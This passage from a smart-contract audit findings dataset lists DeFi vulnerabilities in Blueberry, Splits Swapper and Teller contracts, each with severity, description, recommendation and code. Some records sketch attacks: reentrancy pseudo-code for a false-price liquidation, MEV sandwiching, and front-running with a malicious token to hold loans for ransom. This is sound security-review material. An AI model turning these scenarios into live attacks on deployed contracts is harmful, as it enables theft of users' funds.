Perhaps insert a hook into critical system functions like `BlueBerryBank.liquidate`.\\nAdapt a slightly different read-only solution that checks the Balancer Vault's reentrancy guard without actually entering.чUsers choosing Balancer pool positions (such as Aura vaults) as collateral can be prematurely liquidated due to unreliable price data.ч```\\nAttackerContract.flashLoan() ->\\n // Borrow lots of tokens and trigger a callback.\\n SomeProtocol.flashLoan() ->\\n AttackerContract.exploit()\\n\\nAttackerContract.exploit() ->\\n // Join a Balancer Pool using the borrowed tokens and send some ETH along with the call.\\n BalancerVault.joinPool() ->\\n // The Vault will return the excess ETH to the sender, which will reenter this contract.\\n // At this point in the execution, the BPT supply has been updated but the token balances have not.\\n AttackerContract.receive()\\n\\nAttackerContract.receive() ->\\n // Liquidate a position using the same Balancer Pool as collateral.\\n BlueBerryBank.liquidate() ->\\n // Call to the oracle to check the price.\\n BalancerPairOracle.getPrice() ->\\n // Query the token balances. At this point in the execution, these have not been updated (see above).\\n // So, the balances are still the same as before the start of the large pool join.\\n BalancerVaul.getPoolTokens()\\n\\n // Query the BPT supply. 
At this point in the execution, the supply has already been updated (see above).\\n // So, it includes the latest large pool join, and as such the BPT supply has grown by a large amount.\\n BalancerPool.getTotalSupply()\\n\\n // Now the price is computed using both balances and supply, and the result is much smaller than it should be.\\n price = f(balances) / pool.totalSupply()\\n\\n // The position is liquidated under false pretenses.\\n```\\n -Deadline check is not effective, allowing outdated slippage and allow pending transaction to be unexpected executedчhighчDeadline check is not effective, allowing outdated slippage and allow pending transaction to be unexpected executed\\nIn the current implementation in CurveSpell.sol\\n```\\n{\\n // 2. Swap rewards tokens to debt token\\n uint256 rewards = _doCutRewardsFee(CRV);\\n _ensureApprove(CRV, address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath,\\n address(this),\\n type(uint256).max\\n );\\n}\\n```\\n\\nthe deadline check is set to type(uint256).max, which means the deadline check is disabled!\\nIn IChiSpell. the swap is directedly call on the pool instead of the router\\n```\\nSWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n);\\n```\\n\\nand it has no deadline check for the transaction when swappingчWe recommend the protocol use block.timstamp for swapping deadline for Uniswap V2 and swap with Unsiwap Router V3 instead of the pool directly!чAMMs provide their users with an option to limit the execution of their pending actions, such as swaps or adding and removing liquidity. The most common solution is to include a deadline timestamp as a parameter (for example see Uniswap V2 and Uniswap V3). 
If such an option is not present, users can unknowingly perform bad trades:\\nAlice wants to swap 100 tokens for 1 ETH and later sell the 1 ETH for 1000 DAI.\\nThe transaction is submitted to the mempool, however, Alice chose a transaction fee that is too low for miners to be interested in including her transaction in a block. The transaction stays pending in the mempool for extended periods, which could be hours, days, weeks, or even longer.\\nWhen the average gas fee dropped far enough for Alice's transaction to become interesting again for miners to include it, her swap will be executed. In the meantime, the price of ETH could have drastically changed. She will still get 1 ETH but the DAI value of that output might be significantly lower.\\nShe has unknowingly performed a bad trade due to the pending transaction she forgot about.\\nAn even worse way this issue can be maliciously exploited is through MEV:\\nThe swap transaction is still pending in the mempool. Average fees are still too high for miners to be interested in it.\\nThe price of tokens has gone up significantly since the transaction was signed, meaning Alice would receive a lot more ETH when the swap is executed. But that also means that her maximum slippage value (sqrtPriceLimitX96 and minOut in terms of the Spell contracts) is outdated and would allow for significant slippage.\\nA MEV bot detects the pending transaction. Since the outdated maximum slippage value now allows for high slippage, the bot sandwiches Alice, resulting in significant profit for the bot and significant loss for Alice.ч```\\n{\\n // 2. 
Swap rewards tokens to debt token\\n uint256 rewards = _doCutRewardsFee(CRV);\\n _ensureApprove(CRV, address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath,\\n address(this),\\n type(uint256).max\\n );\\n}\\n```\\n -AuraSpell openPositionFarm does not join poolчmediumчThe function to open a position for the AuraSpell does not join the pool due to wrong conditional check.\\nThe function deposits collateral into the bank, borrow tokens, and attempts to join the pool:\\n```\\n function openPositionFarm(\\n OpenPosParam calldata param\\n )\\n external\\n existingStrategy(param.strategyId)\\n existingCollateral(param.strategyId, param.collToken)\\n {\\n // rest of code\\n // 1. Deposit isolated collaterals on Blueberry Money Market\\n _doLend(param.collToken, param.collAmount);\\n\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on Balancer, get BPT\\n {\\n IBalancerVault vault = wAuraPools.getVault(lpToken);\\n _ensureApprove(param.borrowToken, address(vault), borrowBalance);\\n\\n (address[] memory tokens, uint256[] memory balances, ) = wAuraPools\\n .getPoolTokens(lpToken);\\n uint[] memory maxAmountsIn = new uint[](2);\\n maxAmountsIn[0] = IERC20(tokens[0]).balanceOf(address(this));\\n maxAmountsIn[1] = IERC20(tokens[1]).balanceOf(address(this));\\n\\n uint totalLPSupply = IBalancerPool(lpToken).totalSupply();\\n // compute in reverse order of how Balancer's `joinPool` computes tokenAmountIn\\n uint poolAmountFromA = (maxAmountsIn[0] * totalLPSupply) /\\n balances[0];\\n uint poolAmountFromB = (maxAmountsIn[1] * totalLPSupply) /\\n balances[1];\\n uint poolAmountOut = poolAmountFromA > poolAmountFromB\\n ? 
poolAmountFromB\\n : poolAmountFromA;\\n\\n bytes32 poolId = bytes32(param.farmingPoolId);\\n if (poolAmountOut > 0) {\\n vault.joinPool(\\n poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n tokens,\\n maxAmountsIn,\\n \"\",\\n false\\n )\\n );\\n }\\n }\\n // rest of code\\n }\\n```\\n\\nThe function only borrowed one type of tokens from the bank so the contract only owns one type of token. As a result one of the `maxAmountsIn` value is 0. Either `poolAmountFromA` or `poolAmountFromB` is 0 as a result of computation. `poolAmountOut` is the minimal value of `poolAmountFromA` and `poolAmountFromB`, it is 0. The following check `if (poolAmountOut > 0)` will always fail and the pool will never be joined.чIt is hard to tell the intent of the developer from this check. Maybe the issue is simply that `poolAmountOut` should be the sum or the max value out of `poolAmountFromA` and `poolAmountFromB` instead of the min.чThe rest of the function proceeds correctly without reverting. Users will think they joined the pool and are earning reward while they are not earning anything. This is a loss of funds to the user.ч```\\n function openPositionFarm(\\n OpenPosParam calldata param\\n )\\n external\\n existingStrategy(param.strategyId)\\n existingCollateral(param.strategyId, param.collToken)\\n {\\n // rest of code\\n // 1. Deposit isolated collaterals on Blueberry Money Market\\n _doLend(param.collToken, param.collAmount);\\n\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. 
Add liquidity on Balancer, get BPT\\n {\\n IBalancerVault vault = wAuraPools.getVault(lpToken);\\n _ensureApprove(param.borrowToken, address(vault), borrowBalance);\\n\\n (address[] memory tokens, uint256[] memory balances, ) = wAuraPools\\n .getPoolTokens(lpToken);\\n uint[] memory maxAmountsIn = new uint[](2);\\n maxAmountsIn[0] = IERC20(tokens[0]).balanceOf(address(this));\\n maxAmountsIn[1] = IERC20(tokens[1]).balanceOf(address(this));\\n\\n uint totalLPSupply = IBalancerPool(lpToken).totalSupply();\\n // compute in reverse order of how Balancer's `joinPool` computes tokenAmountIn\\n uint poolAmountFromA = (maxAmountsIn[0] * totalLPSupply) /\\n balances[0];\\n uint poolAmountFromB = (maxAmountsIn[1] * totalLPSupply) /\\n balances[1];\\n uint poolAmountOut = poolAmountFromA > poolAmountFromB\\n ? poolAmountFromB\\n : poolAmountFromA;\\n\\n bytes32 poolId = bytes32(param.farmingPoolId);\\n if (poolAmountOut > 0) {\\n vault.joinPool(\\n poolId,\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest(\\n tokens,\\n maxAmountsIn,\\n \"\",\\n false\\n )\\n );\\n }\\n }\\n // rest of code\\n }\\n```\\n -The protocol will not be able to add liquidity on the curve with another token with a balance.чmediumчThe `CurveSpell` protocol only ensure approve curve pool to spend its borrow token. Hence, it will not be able to add liquidity on the curve with another token with a balance.\\nThe `openPositionFarm()` function enables user to open a leveraged position in a yield farming strategy by borrowing funds and using them to add liquidity to a Curve pool, while also taking into account certain risk management parameters such as maximum LTV and position size. When add liquidity on curve ,the protocol use the borrowed token and the collateral token, it checks the number of tokens in the pool and creates an array of the supplied token amounts to be passed to the add_liquidity function. 
Then the curve will transfer the tokens from the protocol and mint lp tokens to the protocol. However, the protocol only ensure approve curve pool to spend its borrow token. Hence, it will not be able to add liquidity on the curve with another token with a balance.\\n```\\n // 3. Add liquidity on curve\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 4) {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n }\\n```\\nчAllow the curve pool to spend tokens that have a balance in the protocol to add liquidityчThe protocol will not be able to add liquidity on the curve with another token with a balance.ч```\\n // 3. 
Add liquidity on curve\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 4) {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n }\\n```\\n -`getPositionRisk()` will return a wrong value of riskчmediumчIn order to interact with SPELL the users need to `lend()` some collateral which is known as Isolated Collateral and the SoftVault will deposit them into Compound protocol to generate some lending interest (to earn passive yield)\\nto liquidate a position this function `isLiquidatable()` should return `true`\\n```\\n function isLiquidatable(uint256 positionId) public view returns (bool) {\\n return\\n getPositionRisk(positionId) >=\\n banks[positions[positionId].underlyingToken].liqThreshold;\\n }\\n```\\n\\nand it is subcall to `getPositionRisk()`\\n```\\n function getPositionRisk(\\n uint256 positionId\\n ) public view returns (uint256 risk) {\\n uint256 pv = getPositionValue(positionId); \\n uint256 ov = getDebtValue(positionId); \\n uint256 cv = getIsolatedCollateralValue(positionId);\\n\\n if (\\n (cv == 0 && pv == 0 && ov == 0) || pv >= ov // Closed position or Overcollateralized position\\n ) {\\n risk = 0;\\n } else if (cv == 0) {\\n // Sth bad happened to isolated underlying token\\n risk = Constants.DENOMINATOR;\\n } else {\\n risk = ((ov - pv) * 
Constants.DENOMINATOR) / cv;\\n }\\n }\\n```\\n\\nas we can see the `cv` is a critical value in terms of the calculation of `risk` the `cv` is returned by `getIsolatedCollateralValue()`\\n```\\n function getIsolatedCollateralValue(\\n uint256 positionId\\n ) public view override returns (uint256 icollValue) {\\n Position memory pos = positions[positionId];\\n // NOTE: exchangeRateStored has 18 decimals.\\n uint256 underlyingAmount;\\n if (_isSoftVault(pos.underlyingToken)) {\\n underlyingAmount = \\n (ICErc20(banks[pos.debtToken].bToken).exchangeRateStored() * \\n pos.underlyingVaultShare) /\\n Constants.PRICE_PRECISION; \\n } else {\\n underlyingAmount = pos.underlyingVaultShare;\\n }\\n icollValue = oracle.getTokenValue(\\n pos.underlyingToken,\\n underlyingAmount\\n );\\n }\\n```\\n\\nand it uses `exchangeRateStored()` to ask Compound (CToken.sol) for the exchange rate from `CToken` contract\\n```\\nThis function does not accrue interest before calculating the exchange rate\\n```\\n\\nso the `getPositionRisk()` will return a wrong value of risk because the interest does not accrue for this positionчYou shoud use `exchangeRateCurrent()` to Accrue interest first.чthe user (position) could get liquidated even if his position is still healthyч```\\n function isLiquidatable(uint256 positionId) public view returns (bool) {\\n return\\n getPositionRisk(positionId) >=\\n banks[positions[positionId].underlyingToken].liqThreshold;\\n }\\n```\\n -BlueBerryBank#getPositionValue causes DOS if reward token is added that doens't have an oracleчmediumчcollToken.pendingRewards pulls the most recent reward list from Aura/Convex. In the event that reward tokens are added to pools that don't currently have an oracle then it will DOS every action (repaying, liquidating, etc.). 
While this is only temporary it prevents liquidation which is a key process that should have 100% uptime otherwise the protocol could easily be left with bad debt.\\nBlueBerryBank.sol#L408-L413\\n```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n\\nUsing the pendingRewards method pulls a fresh list of all tokens. When a token is added as a reward but can't be priced then the call to getTokenValue will revert. Since getPostionValue is used in liquidations, it temporarily breaks liquidations which in a volatile market can cause bad debt to accumulate.чReturn zero valuation if extra reward token can't be priced.чTemporary DOS to liquidations which can result in bad debtч```\\n (address[] memory tokens, uint256[] memory rewards) = IERC20Wrapper(\\n pos.collToken\\n ).pendingRewards(pos.collId, pos.collateralSize);\\n for (uint256 i; i < tokens.length; i++) {\\n rewardsValue += oracle.getTokenValue(tokens[i], rewards[i]);\\n }\\n```\\n -asking for the wrong address for `balanceOf()`чmediumчShortLongSpell.openPosition() pass to `_doPutCollateral()` wrong value of `balanceOf()`\\n```\\n // 5. Put collateral - strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nthe balance should be of `address(vault)`ч```\\n // 5. 
Put collateral // Remove the line below\\n strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n// Remove the line below\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n// Remove the line below\\n address(this)\\n// Add the line below\\n IERC20Upgradeable(vault).balanceOf(address(this))\\n )\\n );\\n```\\nч`openPosition()` will never workч```\\n // 5. Put collateral - strategy token\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n -AuraSpell#closePositionFarm requires users to swap all reward tokens through same routerчmediumчAuraSpell#closePositionFarm requires users to swap all reward tokens through same router. This is problematic as it is very unlikely that a UniswapV2 router will have good liquidity sources for all tokens and will result in users experiencing forced losses to their reward token.\\nAuraSpell.sol#L193-L203\\n```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAll tokens are forcibly swapped through a single router.чIssue AuraSpell#closePositionFarm requires users to swap all reward tokens through same router\\nAllow users to use an aggregator like paraswap or multiple routers instead of only one single UniswapV2 router.чUsers will be forced to swap through a router even if it doesn't have good liquidity for all tokensч```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n 
type(uint256).max\\n );\\n }\\n```\\n -rewardTokens removed from WAuraPool/WConvexPools will be lost foreverчmediumчpendingRewards pulls a fresh count of reward tokens each time it is called. This is problematic if reward tokens are ever removed from the the underlying Aura/Convex pools because it means that they will no longer be distributed and will be locked in the contract forever.\\nWAuraPools.sol#L166-L189\\n```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength();\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n\\nIn the lines above we can see that only tokens that are currently available on the pool. 
This means that if tokens are removed then they are no longer claimable and will be lost to those entitled to shares.чReward tokens should be stored with the tokenID so that it can still be paid out even if it the extra rewardToken is removed.чUsers will lose reward tokens if they are removedч```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength();\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n -SwapperCallbackValidation doesn't do anything, opens up users to having contracts drainedчmediumчThe `SwapperCallbackValidation` library that is intended to be used by contracts performing swaps does not provide any protection. As a result, all functions intended to be used only in a callback setting can be called any time by any user. In the provided example of how they expect this library to be used, this would result in the opportunity for all funds to be stolen.\\nThe `SwapperCallbackValidation` library is intended to be used by developers to verify that their contracts are only called in a valid, swapper callback scenario. It contains the following function to be implemented:\\n```\\nfunction verifyCallback(SwapperFactory factory_, SwapperImpl swapper_) internal view returns (bool valid) {\\n return factory_.isSwapper(swapper_);\\n}\\n```\\n\\nThis function simply pings the `SwapperFactory` and confirms that the function call is coming from a verified swapper. 
If it is, we assume that it is from a legitimate callback.\\nFor an example of how this is used, see the (out of scope) UniV3Swap contract, which serves as a model for developers to build contracts to support Swappers.\\n```\\nSwapperImpl swapper = SwapperImpl(msg.sender);\\nif (!swapperFactory.verifyCallback(swapper)) {\\n revert Unauthorized();\\n}\\n```\\n\\nThe contract goes on to perform swaps (which can be skipped by passing empty exactInputParams), and then sends all its ETH (or ERC20s) to `msg.sender`. Clearly, this validation is very important to protect such a contract from losing funds.\\nHowever, if we look deeper, we can see that this validation is not nearly sufficient.\\nIn fact, `SwapperImpl` inherits from `WalletImpl`, which contains the following function:\\n```\\nfunction execCalls(Call[] calldata calls_)\\n external\\n payable\\n onlyOwner\\n returns (uint256 blockNumber, bytes[] memory returnData)\\n{\\n blockNumber = block.number;\\n uint256 length = calls_.length;\\n returnData = new bytes[](length);\\n\\n bool success;\\n for (uint256 i; i < length;) {\\n Call calldata calli = calls_[i];\\n (success, returnData[i]) = calli.to.call{value: calli.value}(calli.data);\\n require(success, string(returnData[i]));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n emit ExecCalls(calls_);\\n}\\n```\\n\\nThis function allows the owner of the Swapper to perform arbitrary calls on its behalf.\\nSince the verification only checks that the caller is, in fact, a Swapper, it is possible for any user to create a Swapper and pass arbitrary calldata into this `execCalls()` function, performing any transaction they would like and passing the `verifyCallback()` check.\\nIn the generic case, this makes the `verifyCallback()` function useless, as any calldata that could be called without that function could similarly be called by deploying a Swapper and sending identical calldata through that Swapper.\\nIn the specific case based on the example provided, this would allow a 
user to deploy a Swapper, call the `swapperFlashCallback()` function directly (not as a callback), and steal all the funds held by the contract.чIssue SwapperCallbackValidation doesn't do anything, opens up users to having contracts drained\\nI do not believe that Swappers require the ability to execute arbitrary calls, so should not inherit from WalletImpl.\\nAlternatively, the verification checks performed by contracts accepting callbacks should be more substantial — specifically, they should store the Swapper they are interacting with's address for the duration of the transaction, and only allow callbacks from that specific address.чAll funds can be stolen from any contracts using the `SwapperCallbackValidation` library, because the `verifyCallback()` function provides no protection.ч```\\nfunction verifyCallback(SwapperFactory factory_, SwapperImpl swapper_) internal view returns (bool valid) {\\n return factory_.isSwapper(swapper_);\\n}\\n```\\n -Swapper mechanism cannot incentivize ETH-WETH swaps without risking owner fundsчmediumчWhen `flash()` is called on the Swapper contract, pairs of tokens are passed in consisting of (a) a base token, which is currently held by the contract and (b) a quote token, which is the `$tokenToBeneficiary` that the owner would like to receive.\\nThese pairs are passed to the oracle to get the quoted value of each of them:\\n```\\namountsToBeneficiary = $oracle.getQuoteAmounts(quoteParams_);\\n```\\n\\nThe `UniV3OracleImpl.sol` contract returns a quote per pair of tokens. 
However, since Uniswap pools only consist of WETH (not ETH) and are ordered by token address, it performs two conversions first: `_convert()` converts ETH to WETH for both base and quote tokens, and `_sort()` orders the pairs by token address.\\n```\\nConvertedQuotePair memory cqp = quoteParams_.quotePair._convert(_convertToken);\\nSortedConvertedQuotePair memory scqp = cqp._sort();\\n```\\n\\nThe oracle goes on to check for pair overrides, and gets the `scaledOfferFactor` for the pair being quoted:\\n```\\nPairOverride memory po = _getPairOverride(scqp);\\nif (po.scaledOfferFactor == 0) {\\n po.scaledOfferFactor = $defaultScaledOfferFactor;\\n}\\n```\\n\\nThe `scaledOfferFactor` is the discount being offered through the Swapper to perform the swap. The assumption is that this will be set to a moderate amount (approximately 5%) to incentivize bots to perform the swaps, but will be overridden with a value of ~0% for the same tokens, to ensure that bots aren't paid for swaps they don't need to perform.\\nThe problem is that these overrides are set on the `scqp` (sorted, converted tokens), not the actual token addresses. For this reason, ETH and WETH are considered identical in terms of overrides.\\nTherefore, Swapper owners who want to be paid out in ETH (ie where $tokenToBeneficiary = ETH) have two options:\\nThey can set the WETH-WETH override to 0%, which successfully stops bots from earning a fee on ETH-ETH trades, but will not provide any incentive for bots to swap WETH in the swapper into ETH. This makes the Swapper useless for WETH.\\nThey can keep the WETH-WETH pair at the original ~5%, which will incentivize WETH-ETH swaps, but will also pay 5% to bots for doing nothing when they take ETH out of the contract and return ETH. 
This makes the Swapper waste user funds.\\nThe same issues exist going in the other direction, when `$tokenToBeneficiary = WETH`.чThe `scaledOfferFactor` (along with its overrides) should be stored on the Swapper, not on the Oracle.\\nIn order to keep the system modular and logically organized, the Oracle should always return the accurate price for the `scqp`. Then, it is the job of the Swapper to determine what discount is offered for which asset.\\nThis will allow values to be stored in the actual `base` and `quote` assets being used, and not in their converted, sorted counterparts.чUsers who want to be paid out in ETH or WETH will be forced to either (a) have the Swapper not function properly for a key pair or (b) pay bots to perform useless actions.ч```\\namountsToBeneficiary = $oracle.getQuoteAmounts(quoteParams_);\\n```\\n -CollateralManager#commitCollateral can be called on an active loanчhighчCollateralManager#commitCollateral never checks if the loan has been accepted allowing users to add collaterals after which can DOS the loan.\\nCollateralManager.sol#L117-L130\\n```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue never checks that loan isn't active\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n\\nCollateralManager#commitCollateral does not contain any check that the bidId is pending or at least that it isn't accepted. 
This means that collateral can be committed to an already accepted bid, modifying bidCollaterals.\n```\nfunction _withdraw(uint256 _bidId, address _receiver) internal virtual {\n    for (\n        uint256 i;\n        i < _bidCollaterals[_bidId].collateralAddresses.length();\n        i++\n    ) {\n        // Get collateral info\n        Collateral storage collateralInfo = _bidCollaterals[_bidId]\n            .collateralInfo[\n                _bidCollaterals[_bidId].collateralAddresses.at(i)\n            ];\n        // Withdraw collateral from escrow and send it to bid lender\n        ICollateralEscrowV1(_escrows[_bidId]).withdraw(\n            collateralInfo._collateralAddress,\n            collateralInfo._amount,\n            _receiver\n        );\n```\n\nbidCollaterals is used to trigger the withdrawal from the escrow to the receiver, when closing the loan and during liquidations. This can be used to DOS a loan AFTER it has already been filled.\nUser A creates a bid for 10 ETH against 50,000 USDC at 10% APR\nUser B sees this bid and decides to fill it\nAfter the loan is accepted, User A calls CollateralManager#commitCollateral with a malicious token they create\nUser A doesn't pay their loan and it becomes liquidatable\nUser B calls liquidate but it reverts when the escrow attempts to transfer out the malicious token\nUser A demands a ransom to return the funds\nUser A enables the malicious token transfer once the ransom is paidчCollateralManager#commitCollateral should revert if the loan is active.чLoans can be permanently DOS'd even after being acceptedч```\nfunction commitCollateral(\n    uint256 _bidId,\n    Collateral[] calldata _collateralInfo\n) public returns (bool validation_) {\n    address borrower = tellerV2.getLoanBorrower(_bidId);\n    (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue never checks that loan isn't active\n\n    if (validation_) {\n        for (uint256 i; i < _collateralInfo.length; i++) {\n            Collateral memory info = _collateralInfo[i];\n            _commitCollateral(_bidId, info);\n        }\n    }\n}\n```\n -CollateralManager#commitCollateral can 
be called by anyoneчhighчCollateralManager#commitCollateral has no access control allowing users to freely add malicious tokens to any bid\\nCollateralManager.sol#L117-L130\\n```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue no access control\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n\\nCollateralManager#commitCollateral has no access control and can be called by anyone on any bidID. This allows an attacker to front-run lenders and add malicious tokens to a loan right before it is filled.\\nA malicious user creates a malicious token that can be transferred once before being paused and returns uint256.max for balanceOf\\nUser A creates a loan for 10e18 ETH against 50,000e6 USDC at 10% APR\\nUser B decides to fill this loan and calls TellerV2#lenderAcceptBid\\nThe malicious user sees this and front-runs with a CollateralManager#commitCollateral call adding the malicious token\\nMalicious token is now paused breaking both liquidations and fully paying off the loan\\nMalicious user leverages this to ransom the locked tokens, unpausing when it is paidчCause CollateralManager#commitCollateral to revert if called by anyone other than the borrower, their approved forwarder or TellerV2чUser can add malicious collateral calls to any bid they wishч```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue no access control\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral 
memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n -CollateralManager#commitCollateral overwrites collateralInfo._amount if called with an existing collateralчhighчWhen duplicate collateral is committed, the collateral amount is overwritten with the new value. This allows borrowers to front-run bid acceptance to change their collateral and steal from lenders.\\nCollateralManager.sol#L426-L442\\n```\\nfunction _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; <- @audit-issue collateral info overwritten\\n emit CollateralCommitted(\\n _bidId,\\n _collateralInfo._collateralType,\\n _collateralInfo._collateralAddress,\\n _collateralInfo._amount,\\n _collateralInfo._tokenId\\n );\\n}\\n```\\n\\nWhen a duplicate collateral is committed it overwrites the collateralInfo for that token, which is used to determine how much collateral to escrow from the borrower.\\nTellerV2.sol#L470-L484\\n```\\nfunction lenderAcceptBid(uint256 _bidId)\\n external\\n override\\n pendingBid(_bidId, \"lenderAcceptBid\")\\n whenNotPaused\\n returns (\\n uint256 amountToProtocol,\\n uint256 amountToMarketplace,\\n uint256 amountToBorrower\\n )\\n{\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n```\\n\\nTellerV2#lenderAcceptBid only allows the lender input the bidId of the bid they wish to accept, not allowing them to specify the expected collateral. 
